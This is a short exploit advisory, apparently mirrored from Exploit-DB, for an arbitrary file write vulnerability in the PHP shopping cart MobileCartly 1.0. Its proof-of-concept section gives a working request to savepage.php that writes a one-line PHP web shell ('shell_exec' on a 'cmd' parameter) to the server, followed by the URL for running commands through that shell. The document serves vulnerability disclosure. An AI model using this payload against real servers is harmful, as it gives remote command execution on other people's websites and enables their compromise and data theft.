MobileCartly 1.0 – Arbitrary File Write - 体验盒子

作者： Yakir Wizman

日期： 2012-08-10

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/20422/

# -----------------------------------------------------------
#			 _____ _ ___ 
#			/ ____(_) || || |
#			 | | _| |_ __ ___| | ___| |
#			 | || | __/ _` |/ _` |/ _ \ |
#			 | |____| | || (_| | (_| |__/ |
#			\_____|_|\__\__,_|\__,_|\___|_|
#			
# -----------------------------------------------------------
# MobileCartly 1.0 Arbitrary File Write Vulnerability
# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
# Date 10/08/2012
# Download - http://mobilecartly.com/mobilecartly.zip
# ISRAEL
# -----------------------------------------------------------
#		Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# The application is prone to arbitrary file write / overwrite vulnerability.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE
# FILENAME for example 'shell.php'
# CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'
# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir
# -----------------------------------------------------------